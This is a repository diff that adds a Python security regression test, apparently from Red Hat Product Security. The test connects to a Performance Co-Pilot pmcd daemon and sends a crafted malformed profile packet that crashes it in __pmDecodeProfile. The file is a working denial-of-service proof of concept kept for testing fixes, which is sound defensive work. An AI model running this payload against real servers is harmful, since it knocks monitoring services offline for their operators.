summaryrefslogtreecommitdiff
path: root/qa/secure/crash-profile-instances
diff options
context:
space:
mode:
Diffstat (limited to 'qa/secure/crash-profile-instances')
-rwxr-xr-xqa/secure/crash-profile-instances22
1 files changed, 22 insertions, 0 deletions
diff --git a/qa/secure/crash-profile-instances b/qa/secure/crash-profile-instances
new file mode 100755
index 0000000..58a989e
--- /dev/null
+++ b/qa/secure/crash-profile-instances
@@ -0,0 +1,22 @@
+#
+# usage: python crash-profile-instances HOST
+#
+# Connects to pmcd on HOST and triggers a crash in __pmDecodeProfile.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+import pcppdu
+_, host = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+pcppdu.client_handshake(sock, from_=1)
+pcppdu.send_pmns_names(sock, from_=1, names=(str("hinv.ncpu"),))
+ids = pcppdu.parse_pmns_ids(pcppdu.read_pdu(sock))
+pmid = ids[1].idlist[0]
+pcppdu.send_desc_req(sock, from_=1, pmid=pmid)
+# print(pcppdu.parse_desc(pcppdu.read_pdu(sock)))
+sock.send(str('\x00\x00\x00(\x00\x00p\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
+
+sock.close()
generated by cgit v1.2.3 (git 2.39.1) at 2024-06-09 20:46:12 +0000